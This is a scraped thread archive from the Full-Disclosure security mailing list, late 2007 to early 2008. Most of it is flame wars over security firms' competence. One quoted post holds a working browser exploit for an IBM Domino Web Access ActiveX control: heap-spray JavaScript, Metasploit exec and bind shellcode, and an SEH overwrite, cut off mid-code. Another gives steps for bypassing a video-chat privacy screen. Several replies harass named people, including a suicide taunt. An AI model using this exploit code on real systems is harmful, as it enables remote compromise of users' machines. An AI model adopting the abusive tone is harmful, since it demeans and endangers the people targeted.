On Jan 1, 2008 9:04 AM, Adam Muntner [EMAIL PROTECTED] wrote: I hsve been pentesting since 98 and nearly nonstop since 2000. You cannot spell either and you have been a 'pentester' ... does this mean you ran nessus and other automated testing tools and call yourself a hacker? Sent from my iPhone Please kill yourself ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [Professional IT Security Providers - Exposed] QuietMove ( D - )
You are worthless. http://www.tssci-security.com/bookshelf/ Is this list up to date? It makes it seem as if you are learning basic linux commands, sed, and basic perl. Also why are you reading operating system design and implementation when you do not know C? ( Seeing as C books are in your 'to-read' list ). Do you understand any of the code in it or do you just pick out buzz words to talk about at your 'local meet-ups'. Why dont you explain the finer points of microkernel design to us? You are headed even further down the path of complete lamer seeing as you read books on XSS and all your blog posts revolve around it. even more lulz in your 'plan to read' containing books on fuzzing, metasploit, and writing rootkits. How can you write rootkits when you do not know C and are learning basic unix commands?... lol Hopefully one day you realize that you are just another security industry kiddie and have no real knowledge, but probably not. Seeing as you have your 'bachelors' ( lol - has nothing to do with security ) - I am sure you are well on your way to a cissp. Also for good laugh speople should read: http://www.tssci-security.com/projects/ how long did it take you to write all 40 lines of your 'labs' code? I shall notify perl underground of your horrendous perl and you shalll be a source of great lulz in their next production. Just found this: http://www.tssci-security.com/blog/wp-content/uploads/2007/11/mwielgoszewski_resume.pdfSo you worked 4 places and did nothing useful. Sounds like SImon may want to hire you. ( Hi simon , are your workers still inadequate and you need more help? ) So basically you have worked 4 jobs, went to a community college that has some sort of security program, you know basic perl and C, do not know how to audit any real programs, and blog about XSS. Does this summarize you pretty well? On Jan 1, 2008 10:57 AM, Marcin Wielgoszewski [EMAIL PROTECTED] wrote: Marcin Wielgoszewski here, the green consultant you mentioned but chose not to focus on. I'm not sure what you mean by green, but whatever. I have just finished my bachelor's degree, have done internships with some Fortune-100's and I am constantly doing research on my own. I also make an effort to attend every conference and local meet-up. I have my own blog I started at http://www.tssci-security.com, you can read and learn more about me. Onto QuietMove and Adam Muntner... QuietMove was founded by Adam and the other two folks you mention. I have done some part-time work with Adam over the past couple months while finishing up my last semester. Adam knows this industry inside-out, and one of only several people I would say really knows his stuff. I'm sorry the website doesn't have an infosec glossary of terms for you to study for your Security+. I guess looking on LinkedIn and the website passes off as research nowadays. Couldn't you have at least used Maltego to look deeper into this? I was actually going to make a post about how pathetic the research some people have tried to pass off lately in security, and no one, except for a few have called anyone out on it. Some security consulting firms you would give a higher score are some of the firms we've picked up where traceroute, whois and their nmap scanners left off. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [Professional IT Security Providers - Exposed] QuietMove ( D - )
your attitude sure has changed since your last post. Maybe you shouldn't sound so commanding on a real list next time and instead stick to your local 2600 meetings. On Jan 1, 2008 1:08 PM, Marcin Wielgoszewski [EMAIL PROTECTED] wrote: You're right. I'm new and young and I'll be the first to admit it. We can't all be born security gurus, and I'm not trying to hide that, but me aside... what have you done besides hide behind your gmail account and troll FD? Thanks for pointing out those two pages, two pages out of 100's that were posted a long time ago and yes, are very out of date. On Jan 1, 2008 1:33 PM, reepex [EMAIL PROTECTED] wrote: You are worthless. http://www.tssci-security.com/bookshelf/ Is this list up to date? It makes it seem as if you are learning basic linux commands, sed, and basic perl. Also why are you reading operating system design and implementation when you do not know C? ( Seeing as C books are in your 'to-read' list ). Do you understand any of the code in it or do you just pick out buzz words to talk about at your 'local meet-ups'. Why dont you explain the finer points of microkernel design to us? You are headed even further down the path of complete lamer seeing as you read books on XSS and all your blog posts revolve around it. even more lulz in your 'plan to read' containing books on fuzzing, metasploit, and writing rootkits. How can you write rootkits when you do not know C and are learning basic unix commands?... lol Hopefully one day you realize that you are just another security industry kiddie and have no real knowledge, but probably not. Seeing as you have your 'bachelors' ( lol - has nothing to do with security ) - I am sure you are well on your way to a cissp. Also for good laugh speople should read: http://www.tssci-security.com/projects/ how long did it take you to write all 40 lines of your 'labs' code? I shall notify perl underground of your horrendous perl and you shalll be a source of great lulz in their next production. Just found this: http://www.tssci-security.com/blog/wp-content/uploads/2007/11/mwielgoszewski_resume.pdf So you worked 4 places and did nothing useful. Sounds like SImon may want to hire you. ( Hi simon , are your workers still inadequate and you need more help? ) So basically you have worked 4 jobs, went to a community college that has some sort of security program, you know basic perl and C, do not know how to audit any real programs, and blog about XSS. Does this summarize you pretty well? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [Professional IT Security Providers - Exposed] QuietMove ( D - )
So what exactly do you do then? Please explain your skills to us since you conveinenly avoided my questions about your metasploit and auto hacking skills. On Jan 1, 2008 1:33 PM, Adam Muntner [EMAIL PROTECTED] wrote: That would be an incorrect assumption. As I mentioned in the followup email - I types my response on my phones touchscreen, on a moving train. D- on your reading comprehension skills. F on your need to diss, anonymously. F- on if there is such a thing based on your suggestion of suicide for my choice in cell phone. Save your allowance and maybe you could buy one, too. I will stand by my words. I sign my name to them. Though, based on the content and quality of your posts, I see why you won't. Adam Muntner Managing Partner QuietMove, Inc. http://www.quietmove.com Sent from my iPhone On Jan 1, 2008, at 1:12 PM, reepex [EMAIL PROTECTED] wrote: On Jan 1, 2008 9:04 AM, Adam Muntner [EMAIL PROTECTED] [EMAIL PROTECTED] wrote: I hsve been pentesting since 98 and nearly nonstop since 2000. You cannot spell either and you have been a 'pentester' ... does this mean you ran nessus and other automated testing tools and call yourself a hacker? Sent from my iPhone Please kill yourself ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [Professional IT Security Providers - Exposed] QuietMove ( D - )
On Dec 31, 2007 9:36 PM, Andre Gironda [EMAIL PROTECTED] wrote: Sites such as PullThePlug, HackThisSite, etc all borrowed ideas from UPT, what exactly was borrowed? because I am pretty sure none of the hackthissite founders were around when this magazine was. There are few PCI ASV's or penetration testing companies that I would find any value in -- and QuietMove exceeds my expectations in this area. what are their methods? No one has answered that yet.. I imagine being a small company they must rely on alot of automated testing due to time/man power restraints ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [Professional IT Security Providers - Exposed] QuietMove ( D - )
On Jan 1, 2008 9:53 PM, Andre Gironda [EMAIL PROTECTED] wrote: I wouldn't do a direct comparison, but I thought UPT was more about being funny than being seriously challenging. ok so they are nothing alike because ptp/hts actually teach you stuff while UPT was for jokes... so your post was stupid Look, you rated Denim Group as A-. You must either work there - or know the guys. Dan Cornell is a moron compared to Adam Muntner - and his code is certainly worse (e.g. Sprajax). I am not a part of secreview but I realize following email threads is very complicated for you. Adam and team know Burp Suite, use manual web application testing - in addition to traditional dynamic and static analysis. I have seen Adam and crew using Fortify Software's SCA and Tracer tools. I have seen them using Hailstorm ARC and modifying the Javascript included in the SmartAttack library. I would call this a best-of-breed security testing methodology. So you list 5 tools they use then mention they modify a javascript library... So basically they use automated tools and are former web developers ... sound pretty hardcore More people will read mine than anything you do -- and with my name on it -- they are certainly bound to take it a lot more seriously. You must be a cissp because you take yourself and the internet very seriously. I am pretty sure no one cares about your opinion either. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [Professional IT Security Providers - Exposed] QuietMove ( D - )
On Jan 1, 2008 9:35 PM, SecReview [EMAIL PROTECTED] wrote: QuietMove has not provided us with any information that contradicts anything that we've written in our origional post. We're still waiting for answers back from them. It is probably because they, like everyone else, do not care about your opinion. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] IBM Domino Web Access Upload Module inotes6w.dll SEH Overwrite Exploit
seh overwrites are the new scriptalert(document.cookie)/script ?
On Dec 31, 2007 8:55 AM, [EMAIL PROTECTED] wrote:
This one is the same offset as dwa7w and the same class id as
inotes6. Basically inotes6 and inotes6w share the same class id,
except that inotes6w is unicode. dwa7w is unicode and has a
different class id. Code is inline, I would attach it except for
the fact that I set off way to many av scanners with my last
messages.
-
!--
written by e.b.
IBM Domino Web Access Upload Module inotes6w.dll SEH Overwrite
Exploit
CVE-2007-4474
Tested on Windows XP SP2(fully patched) English, IE6, inotes6w.dll
version 6.0.48.0
Thanks to h.d.m. and the Metasploit crew
--
html
head
titleIBM Domino Web Access Upload Module inotes6w.dll SEH
Overwrite Exploit/title
script language=JavaScript defer
function Check() {
var buf = unescape(%u4141);
while (buf.length = 2461) buf = buf + unescape(%u4141);
// win32_exec - EXITFUNC=seh CMD=c:\windows\system32\calc.exe
Size=378 Encoder=Alpha2 http://metasploit.com
var shellcode1 =
unescape(%u03eb%ueb59%ue805%ufff8%u%u4949%u4949%u4949 +
%u4948%u4949%u4949%u4949%u4949%u4949%u5a51%u436a +
%u3058%u3142%u4250%u6b41%u4142%u4253%u4232%u3241 +
%u4141%u4130%u5841%u3850%u4242%u4875%u6b69%u4d4c +
%u6338%u7574%u3350%u6730%u4c70%u734b%u5775%u6e4c +
%u636b%u454c%u6355%u3348%u5831%u6c6f%u704b%u774f +
%u6e68%u736b%u716f%u6530%u6a51%u724b%u4e69%u366b +
%u4e54%u456b%u4a51%u464e%u6b51%u4f70%u4c69%u6e6c +
%u5964%u7350%u5344%u5837%u7a41%u546a%u334d%u7831 +
%u4842%u7a6b%u7754%u524b%u6674%u3444%u6244%u5955 +
%u6e75%u416b%u364f%u4544%u6a51%u534b%u4c56%u464b +
%u726c%u4c6b%u534b%u376f%u636c%u6a31%u4e4b%u756b +
%u6c4c%u544b%u4841%u4d6b%u5159%u514c%u3434%u4a44 +
%u3063%u6f31%u6230%u4e44%u716b%u5450%u4b70%u6b35 +
%u5070%u4678%u6c6c%u634b%u4470%u4c4c%u444b%u3530 +
%u6e4c%u6c4d%u614b%u5578%u6a58%u644b%u4e49%u6b6b +
%u6c30%u5770%u5770%u4770%u4c70%u704b%u4768%u714c +
%u444f%u6b71%u3346%u6650%u4f36%u4c79%u6e38%u4f63 +
%u7130%u306b%u4150%u5878%u6c70%u534a%u5134%u334f +
%u4e58%u3978%u6d6e%u465a%u616e%u4b47%u694f%u6377 +
%u4553%u336a%u726c%u3057%u5069%u626e%u7044%u736f +
%u4147%u4163%u504c%u4273%u3159%u5063%u6574%u7035 +
%u546d%u6573%u3362%u306c%u4163%u7071%u536c%u6653 +
%u314e%u7475%u7038%u7765%u4370);
// win32_bind - EXITFUNC=seh LPORT= Size=696 Encoder=Alpha2
http://metasploit.com
var shellcode2 =
unescape(%u03eb%ueb59%ue805%ufff8%u%u4949%u4949%u4949 +
%u4949%u4949%u4949%u4949%u4949%u4937%u5a51%u436a +
%u3058%u3142%u4150%u6b42%u4141%u4153%u4132%u3241 +
%u4142%u4230%u5841%u3850%u4241%u7875%u4b69%u724c +
%u584a%u526b%u4a6d%u4a48%u6b59%u6b4f%u694f%u416f +
%u4e70%u526b%u744c%u4164%u6e34%u376b%u5535%u4c6c +
%u714b%u646c%u6145%u7468%u6a41%u6e4f%u626b%u326f +
%u6c38%u334b%u376f%u5550%u7851%u316b%u6c59%u504b +
%u6e34%u466b%u6861%u456e%u6f61%u6c30%u6c59%u6b6c +
%u3934%u4150%u3764%u6877%u6941%u565a%u636d%u4b31 +
%u7872%u6c6b%u7534%u566b%u3134%u5734%u5458%u6b35 +
%u6e55%u336b%u556f%u7474%u7841%u416b%u4c76%u464b +
%u626c%u6e6b%u416b%u354f%u564c%u6861%u666b%u3663 +
%u6c4c%u6b4b%u7239%u444c%u5764%u616c%u4f71%u4733 +
%u6b41%u336b%u4c54%u634b%u7073%u6c30%u534b%u6470 +
%u6c4c%u724b%u4550%u4e4c%u6c4d%u374b%u7530%u7358 +
%u426e%u4c48%u524e%u466e%u586e%u566c%u3930%u586f +
%u7156%u4676%u7233%u6346%u3058%u7033%u3332%u5458 +
%u5237%u4553%u5162%u504f%u4b54%u5a4f%u3370%u6a58 +
%u686b%u596d%u456c%u466b%u4930%u596f%u7346%u4e6f +
%u5869%u7365%u4d56%u5851%u366d%u6468%u7242%u7275 +
%u674a%u5972%u6e6f%u7230%u4a48%u5679%u6b69%u6e45 +
%u764d%u6b37%u584f%u3356%u3063%u5053%u7653%u7033 +
%u3353%u5373%u3763%u5633%u6b33%u5a4f%u3270%u5046 +
%u3568%u7141%u304c%u3366%u6c63%u6d49%u6a31%u7035 +
%u6e68%u3544%u524a%u4b50%u7177%u4b47%u4e4f%u3036 +
%u526a%u3130%u7041%u5955%u6e6f%u3030%u6c68%u4c64 +
%u546d%u796e%u3179%u5947%u596f%u4646%u6633%u6b35 +
%u584f%u6350%u4b58%u7355%u4c79%u4146%u6359%u4b67 +
%u784f%u7656%u5330%u4164%u3344%u7965%u4e6f%u4e30 +
%u7173%u5878%u6167%u6969%u7156%u6269%u3977%u6a6f +
%u5176%u4945%u4e6f%u5130%u5376%u715a%u7274%u6246 +
%u3048%u3063%u6c6d%u5a49%u6345%u625a%u7670%u3139 +
%u5839%u4e4c%u4d69%u5337%u335a%u4e74%u4b69%u5652 +
%u4b51%u6c70%u6f33%u495a%u336e%u4472%u6b6d%u374e +
%u7632%u6e4c%u6c73%u704d%u767a%u6c58%u4e6b%u4c4b +
%u736b%u5358%u7942%u6d6e%u7463%u6b56%u304f%u7075 +
%u4b44%u794f%u5346%u706b%u7057%u7152%u5041%u4251 +
%u4171%u337a%u4231%u4171%u5141%u6645%u6931%u5a6f +
%u5070%u6e68%u5a4d%u5679%u6865%u334e%u3963%u586f +
%u6356%u4b5a%u4b4f%u704f%u4b37%u4a4f%u4c70%u614b +
%u6b47%u4d4c%u6b53%u3174%u4974%u596f%u7046%u5952 +
%u4e6f%u6330%u6c58%u6f30%u577a%u6174%u324f%u4b73 +
%u684f%u3956%u386f%u4350);
var next_seh_pointer = unescape(%u06EB%u9090); //2 byte
jump
//oleacc.dll Windows XP SP2 English 0x74C96950 pop ebp -
pop -
retbis
Re: [Full-disclosure] iFriends free video chat exploit
your profanity is not appreciated. If you are going to troll at least think of something original and/or clever. On Dec 28, 2007 6:37 PM, damncon [EMAIL PROTECTED] wrote: SHUT THE FUCK UP VALDIS On Dec 28, 2007 7:51 PM, [EMAIL PROTECTED] wrote: On Fri, 28 Dec 2007 16:09:23 CST, Ifriends Exploit said: If you don't have an iFriends account, and do not wish to get one, find a chathost utilizing EasyCam, and enter their Guest Chatroom, follow the steps above, except look for a file named LSChatViewG.swf instead... this is the flash file for guest chats. Once you've downloaded this file, you'll need to use a Flash decompiler to decompile this file, and then delete the privacy screen and recompile it. Gaak. ;) Remember kiddies - friends don't let friends deploy systems that depend on untrusted end hosts to do validation of critical information for them.. .;) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Fwd: beyond security sucks at coding
In case you missed it before
-- Forwarded message --
From: reepex [EMAIL PROTECTED]
Date: Dec 23, 2007 8:22 PM
Subject: beyond security sucks at coding
To: full-disclosure@lists.grok.org.uk, Gadi Evron [EMAIL PROTECTED]
http://www.milw0rm.com/exploits/4773
Gadi and Noam Rathaus and the crew suck at coding once again.
From the exploit:
my $ciphers = ;
my $ciphers_length = pack('n', length($ciphers));
my $certificate = ;
my $certificate_length = pack('n', length($certificate));
I think the italian Phd students can write better perl than this.
You have to give it to Gadi and friends though spending the last year (
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2006-4343 Original release
date:9/28/2006 ) writing this complex exploit and testing it to work
on all
platforms ever created.
Noam's inability to code now shows me why all his books (
http://www.amazon.com/s?ie=UTF8search-type=ssindex=booksfield-author=Noam%20Rathauspage=1)
are basic extensions and ripoffs of other peoples' code and why he
contributes nothing original or useful.
I guess to work at beyond security you must be a master in the art of
copy/paste, stealing code, and bullshitting technical knowledge
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] AOL YGP Picture Editor YGPPicEdit.dll Multiple Buffer Overflows
I believe I have contributed greatly to the security community with my post here. Not only have I denied another 0x41414141 hacker but I have also made Valdis have to backtrack on his ( as usual) stupid post. I believe Valdis and Billy O Reilly have alot in common. ( I was wrong. I am not pleased about it at all and I think all Americans should be concerned about this…What do you want me to do, go over and kiss the camera? ). On Dec 27, 2007 9:05 AM, Elazar Broad [EMAIL PROTECTED] wrote: After some more analysis by Carsten Eiram @ Secunia, this is NOT exploitable. I would like to apologize for the hasty post. SecurityFocus, please update bid 27026 to reflect the fact that at most, this can just crash the browser. Elazar -Original Message- From: [EMAIL PROTECTED] Sent: Dec 26, 2007 1:28 AM To: reepex [EMAIL PROTECTED] Cc: Elazar Broad [EMAIL PROTECTED], full-disclosure@lists.grok.org.uk Subject: Re: [Full-disclosure] AOL YGP Picture Editor YGPPicEdit.dllMultiple Buffer Overflows On Tue, 25 Dec 2007 21:53:29 CST, reepex said: How does a bunch of 'A's prove something is exploitable? If a bunch of A's causes the EIP to end up as x'41414141', it's 95% of the way to being an exploit. If it gets you some *other* crash, it's probably at least 30% to 40% of the way to an exploit. Go back and read the analysis of the NTP buffer overflow from a number of years back. Truly a classic - they managed to leverage a *one byte* overflow into a complete and total rooting of the box. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] AOL YGP Picture Editor YGPPicEdit.dll Multiple Buffer Overflows
On Dec 25, 2007 5:29 PM, Elazar Broad [EMAIL PROTECTED] wrote: The AOL YGP Picture Editor Control(AIM PicEditor Control) version 9.5.1.8suffers from multiple exploitable buffer overflows in various properties. This object is marked safe for scripting. I have not tested other versions. PoC as follows: How does a bunch of 'A's prove something is exploitable? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] beyond security sucks at coding
http://www.milw0rm.com/exploits/4773
Gadi and Noam Rathaus and the crew suck at coding once again.
From the exploit:
my $ciphers = ;
my $ciphers_length = pack('n', length($ciphers));
my $certificate = ;
my $certificate_length = pack('n', length($certificate));
I think the italian Phd students can write better perl than this.
You have to give it to Gadi and friends though spending the last year (
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2006-4343 Original release
date:9/28/2006 ) writing this complex exploit and testing it to work
on all
platforms ever created.
Noam's inability to code now shows me why all his books (
http://www.amazon.com/s?ie=UTF8search-type=ssindex=booksfield-author=Noam%20Rathauspage=1)
are basic extensions and ripoffs of other peoples' code and why he
contributes nothing original or useful.
I guess to work at beyond security you must be a master in the art of
copy/paste, stealing code, and bullshitting technical knowledge
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] hey irmplc
when should we expect more ground breaking 0day from you and your company? We wouldn't want to keep Cisco complacent for too long ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] For Christmas..
if this happened all FD members would go broke because they are kiddies who rely on automated tools for everything On Dec 19, 2007 3:59 PM, gmaggro [EMAIL PROTECTED] wrote: ..it would be a nice touch if everyone sent a few dollars to the projects or authors of the security tools they use. I have donated a bit already to some of my favourites, but I'm only one person. Alot of folks have worked hard to bring us some good shit, let's give a little back. In fact, let's give alot more back then we have been doing, collectively (ugh) speaking. Think of it as enlightened self-interest; helping these folks out makes it far more likely you'll see even more good stuff from them in the future. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [Professional IT Security Providers - Exposed] Cybertrust ( C + )
nothing don ever does is useful or funny On Dec 20, 2007 2:14 PM, SecReview [EMAIL PROTECTED] wrote: Don, the origional poster is anonymous so its not actually that funny. On Thu, 20 Dec 2007 14:59:01 -0500 don bailey [EMAIL PROTECTED] wrote: SecReview wrote: Awesome, ... would you be willing to answer a few questions that we have so that we can revise our post? ... and we'd keep you anonymous. This is the most comedic statement on full disclosure this month. I, too, will ask you publicly for information that I will then say is completely anonymous when I repost. D Regards, The Secreview Team http://secreview.blogspot.com -- Click for the hottest computer games. http://tagline.hushmail.com/fc/Ioyw6h4c5brEaiBtWVaY5EthEQQcN193kGB0iPvERBbexWF6EMgTV2/ Professional IT Security Service Providers - Exposed ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] iDefense Security Advisory 12.17.07: Apple Mac OS X mount_smbfs Stack Based Buffer Overflow Vulnerability
lulz ... nice find maybe Gadi Evron can publish his first exploit now On Dec 18, 2007 12:25 PM, iDefense Labs [EMAIL PROTECTED] wrote: iDefense Security Advisory 12.17.07 http://labs.idefense.com/intelligence/vulnerabilities/ Dec 17, 2007 I. BACKGROUND The mount_smbfs utility is used to mount a remote SMB share locally. It is installed set-uid root, so as to allow unprivileged users to mount shares, and is present in a default installation on both the Server and Desktop versions of Mac OS X. For more information visit the following URL. http://developer.apple.com/documentation/Darwin/Reference/ManPages/man8/mount_smbfs.8.html II. DESCRIPTION Local exploitation of a stack based buffer overflow vulnerability in Apple Inc.'s Mac OS X mount_smbfs utility could allow an attacker to execute arbitrary code with root privileges. The vulnerability exists in a portion of code responsible for parsing command line arguments. When processing the -W option, which is used to specify a workgroup name, the option's argument is copied into a fixed sized stack buffer without any checks on its length. This leads to a trivially exploitable stack based buffer overflow. III. ANALYSIS Exploitation of this vulnerability results in the execution of arbitrary code with root privileges. In order to exploit this vulnerability, an attacker must have execute permission for the set-uid root mount_smbfs binary. IV. DETECTION iDefense has confirmed the existence of this vulnerability in Mac OS X version 10.4.10, on both the Server and Desktop versions. Previous versions may also be affected. V. WORKAROUND Removing the set-uid bit from the mount_smbfs binary will prevent exploitation. However, non-root users will be unable to use the program. VI. VENDOR RESPONSE Apple addressed this vulnerability within their Mac OS X 2007-009 security update. More information is available at the following URL. http://docs.info.apple.com/article.html?artnum=307179 VII. CVE INFORMATION The Common Vulnerabilities and Exposures (CVE) project has assigned the name CVE-2007-3876 to this issue. This is a candidate for inclusion in the CVE list (http://cve.mitre.org/), which standardizes names for security problems. VIII. DISCLOSURE TIMELINE 07/16/2007 Initial vendor notification 07/17/2007 Initial vendor response 12/17/2007 Coordinated public disclosure IX. CREDIT This vulnerability was discovered by Sean Larsson of VeriSign iDefense Labs. Get paid for vulnerability research http://labs.idefense.com/methodology/vulnerability/vcp.php Free tools, research and upcoming events http://labs.idefense.com/ X. LEGAL NOTICES Copyright (c) 2007 iDefense, Inc. Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDefense. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please e-mail [EMAIL PROTECTED] for permission. Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Sendmail/Postfix Storybook
So a kid posts his first found exploit to every mailing list and you are going to bash him? If you scare him off or discourage him then we wont get code and screenshots from his future high-risk 0day. On Dec 15, 2007 7:29 AM, fabio [EMAIL PROTECTED] wrote: wtf? remote exploit? you need an user account and all you get is.. a command executed by the same user account. Isn't easier just to login on the box? CtrlAltCa kcope wrote: Look, it's the Sendmail/postfix the Storybook ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Small Design Bug in Postfix - REMOTE
this kid spent many hard hours reading man pages looking for 0day, gives it to us along with hello world python networking code ( that is incapable of parsing replies so any unintended behaviour causes exit), and you are going to bash it? You are probably just jealous you do not have the technical ability required to find these types of vulnerabilities and write reliable remote exploits for them. On Dec 14, 2007 3:11 PM, [EMAIL PROTECTED] wrote: On Fri, 14 Dec 2007 13:52:33 CST, Adam N said: No, the idea is that you are a user with no login access, only FTP. By doing this, you get shell access (with sane privileges, thankfully) when you're supposed to only have FTP. And this is why, for at least 2 decades, it's been recommended that people doing the FTP-only user put the writeable directories for that user under ~ftp/$USER or some such, rather than ~$USER, and make the login shell for the user /bin/false, and other such things. For bonus points - if it's an FTP-only userid, why does the sysadmin not have e-mail for the userid *blocked*? After all, if they can't login, they can't *read* any mail that gets delivered to the system. Even if you fix the MTA to drop mail directly in $HOME/mbox, it's the rare FTP daemon that understands the locking needed to make this work - that's the primary reason why the POP protocol was invented. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [Professional IT Security Providers - Exposed] Cyberklix ( F+ )
I have been following your blog alot and think the idea is really awesome but this one line... On Dec 13, 2007 2:23 PM, secreview [EMAIL PROTECTED] wrote: true Ethical Hacker talent. Was this meant to be humorous? You realize that 'ethical hacker' ( as in the certification) is a bunch of X geek squad guys running nmap and nessus waiting for the last day where they learn about the coveted Stack Overflow? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Microsoft FTP Client Multiple Bufferoverflow Vulnerability
so are you now admitting your vulnerability was worthless? On Dec 13, 2007 12:02 PM, Morning Wood [EMAIL PROTECTED] wrote: im so hurt now... you make me feel so small compared to your great worx MrReepass stfu kthnx - Original Message - From: reepex [EMAIL PROTECTED] To: Morning Wood [EMAIL PROTECTED]; full-disclosure@lists.grok.org.uk Sent: Wednesday, December 12, 2007 9:01 PM Subject: Re: [Full-disclosure] Microsoft FTP Client Multiple Bufferoverflow Vulnerability wow thats quite impressive.. you couldnt exploit a basic overflow and two years later someone else did you must be quite proud. Did you tell your family and co workers about this great finding? I hear tipping point and idefense are hiring you should forward them this set of emails. On Dec 12, 2007 2:38 AM, Morning Wood [EMAIL PROTECTED] wrote: One of my first advisories and was rediscovered later, turned into a viable exploit 2 years after by another researcher. http://framework.metasploit.com/exploits/view/?refname=windows:ftp:netterm_netftpd_user http://metasploit.com:5/EXPLOITS?MODE=SELECTMODULE=%6e%65%74%74%65%72%6d%5f%6e%65%74%66%74%70%64%5f%75%73%65%72%5f%6f%76%65%72%66%6c%6f%77 *hugz* - Original Message - From: reepex [EMAIL PROTECTED] To: Morning Wood [EMAIL PROTECTED]; full-disclosure@lists.grok.org.uk Sent: Tuesday, December 11, 2007 1:58 PM Subject: Re: [Full-disclosure] Microsoft FTP Client Multiple Bufferoverflow Vulnerability are you serious? http://www.derkeiler.com/Mailing-Lists/securityfocus/bugtraq/2003-07/0259.html I guess you are a 'brain dead india wannabe sec researcher' also? On Dec 11, 2007 6:22 AM, Morning Wood [EMAIL PROTECTED] wrote: advisories like this are typical of brain dead India wannabe sec researchers nuff said ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Fwd: Websense 6.3.1 Filtering Bypass
